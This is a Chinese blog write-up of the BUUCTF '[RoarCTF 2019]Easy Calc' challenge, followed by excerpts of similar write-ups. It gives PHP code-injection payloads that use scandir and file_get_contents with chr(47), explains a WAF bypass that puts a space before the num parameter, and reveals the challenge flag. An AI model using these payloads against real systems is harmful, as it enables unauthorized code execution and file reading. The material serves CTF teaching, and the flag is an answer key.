BUUCTF---[RoarCTF 2019]Easy Calc1

最新推荐文章于 2024-05-08 21:00:43 发布
最新推荐文章于 2024-05-08 21:00:43 发布
阅读量613 收藏 10
点赞数 14
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75556700/article/details/136467822
版权

1.题目描述

2.搜索网址是一个计算器,输入正常的运算,可以运算

3.查看源码,发现有一个calc.php

4.访问calc.php,代码提示用get方式传输num参数,但是过滤了\等等。

5.构造play load,发现了一个f1agg.

num=print_r(scandir(chr(47)))

chr(47)是“/”的ASCII编码

scandir()是用来扫描文件目录

print_r是将扫描结果打印出来

6.尝试访问f1agg

num=print_r(file_get_contents(chr(47).f1agg))

file_get_conctents()用来读取f1agg里面的内容,最后print_r将内容输出

7.

flag{de45bb5f-1b75-4b33-99fb-904f876df79f}

不拿flag不改名
关注
  • 14
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[RoarCTF 2019]Easy Calc 1
weixin_45674567的博客
06-02 2731
查看源码 于是访问calc.php试试 给num参数传字母不行 WAF的问题:WAF不允许num传入字母,那我们可以在num前加个空格来绕过WAF 这里利用PHP的字符串解析特性来绕过WAF,如 calc.php? num=phpinfo(); 知识点 扫根目录下的所有文件,也就是scandir("/") ? num=print_r(scandir('/')); 这里由于单引号被过滤了,那就用chr()绕过,chr(47)就是斜杠/ ? num=print_r(scandir(chr(47))).
BUUCTF [RoarCTF 2019]Easy Calc1
qq_35874748的博客
10-19 2958
一.打开题目后: 二.Ctrl+U查看源代码: 发现存在WAF和一个文件calc.php,这里我们就需要简单的了解下什么是WAF了: WAF的全称是(Web Application Firewall)即Web应用防火墙,简称WAF。 那么WAF能做什么? WAF可以过滤HTTP/HTTPS协议流量,防护Web攻击。 WAF可以对Web应用进行安全审计 WAF可以防止CC攻击 应用交付 CC攻击:通过大量请求对应用程序资源消耗最大的应用,如...
BUUCTF[RoarCTF 2019]Easy Calc
楼阁de猫的博客
12-23 146
[RoarCTF 2019]Easy Calc 查看源码 $("#content").val(): 获取id为content的HTML标签元素的值,是JQuery, 发现有calc.php,看看有什么 这里显示了waf的过滤规则 我们上传字符发现都被过滤了,这里考察的是PHP的字符串解析特性 PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1.删除空白符 2.将某些字符转换为下划线(包括空格) 利用这个特性,我们就可以在num前面加一个空格,然后就能绕过waf,执行
BUUCTF-WEB
ccfly1012的博客
11-02 3845
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF-WriteUp
鱼的博客
02-01 729
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
BUUCTF-WEB刷题记录-1
weixin_44145820的博客
04-06 883
目录[HCTF 2018]WarmUp[强网杯 2019]随便注[护网杯 2018]easy_tornado[SUCTF 2019]EasySQL[HCTF 2018]admin[RoarCTF 2019]Easy Calc[极客大挑战 2019]EasySQL[强网杯 2019]高明的黑客[极客大挑战 2019]Havefun[SUCTF 2019]CheckIn[CISCN2019 华北赛区 ...
[RoarCTF 2019]Easy Calc1
最新发布
m0_74312676的博客
05-08 316
再尝试打开f1agg文件,php中用“."来连接,file_get_contents函数用于读取文件内容,构造“/f1agg"如下。还有注意num前面要加一个空格用于绕过waf,在php中" num"(有空格)会被解释为"num'(没有空格)chr(47)表示的是ASCII码47对应的字符,即“/”,表示列出文件。在index文件夹里面可以看到,有个calc.php文件,尝试访问。scandir()用来获取目录文件。这是一篇简单的waf漏洞的题目。var_dump()用来打印。显示的是拥有waf保护。
BUUCTF】[RoarCTF 2019]Easy Calc1
aoao331198的博客
03-14 382
题目网页是一个计算器 查看源代码发现线索calc.php 直接访问 这里对eval对get的内容执行,尝试注入php代码 前面也说了waf,我们这里利用php解析字符串的特性来绕过 PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1)删除空白符 2)将某些字符转换为下划线(包括空格) 图片来源博客PHP字符串解析特性 ($GET/$POST参数绕过)(含例题 buuctf easycalc)_bin789456的博客-CS...
BUUCTF-[RoarCTF 2019]Easy Calc1
Monica的博客
09-20 664
目录 题目: 方法一: 知识点: 分析: 方法二 知识点: 题目: 页面应该是一个计算器,其他的没有什么发现,日常查看源代码: 访问calc.php,发现源码: <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', .
Thermo-Calc Software用户指南:命令详解
1. **HELP命令**: - 这个命令用于显示可用的命令列表或提供特定命令的详细信息。 - 用户可以通过两种方式使用此命令:输入`HELP <命令名称>`来获取某个特定命令的帮助,或者直接输入`HELP`,系统会列出所有可用的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值